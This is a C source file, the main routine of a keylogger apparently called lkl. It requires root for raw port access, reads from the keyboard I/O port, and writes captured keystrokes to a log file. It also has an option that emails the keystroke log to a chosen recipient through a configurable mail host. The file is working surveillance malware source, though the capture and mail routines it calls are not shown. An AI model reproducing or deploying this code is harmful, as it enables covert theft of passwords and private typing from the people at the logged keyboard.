#include "lkl.h"

int main(int argc, char *argv[])
{
  char opt;
  extern char *optarg;
  struct lkl lkl;
     memset(&lkl, 0, sizeof(lkl));
     lkl.port = KEYBOARD_PORT;
  
  if(getuid() || getgid()){
    printf("Have to be root to perform a iopl()!\n");
    exit(1);
  }
  if(argc == 1){
    usage();
    exit(1);
  }
  while((opt = getopt(argc, argv, "o:k:m:t:hlb")) != -1)
    switch(opt){
       case 'l':
	 lkl.log = 1;
         break;
       case 'o':
         lkl.outfile = optarg;
         break;
       case 'k':
         lkl.km_file = optarg;
	 break;
       case 'b':
	 lkl.debug = 1;
	 break;
       case 'm':
	 lkl.mail = 1;
	 lkl.rcpt = optarg;
         lkl.host = "127.0.0.1";
	 break;
       case 't':
	 lkl.host = optarg;
	 break;
       case 'h':
	 usage();
	 exit(0);
       default:
         usage();
         exit(1);
    }

  if(lkl.log){
    printf("\nStarted to log port 0x%02x. Keymap is %s. The logfile is %s.\n", lkl.port, lkl.km_file, lkl.outfile);
    def_keymap(lkl.km_file);
    start_log(&lkl);
  }

  return 0;
}
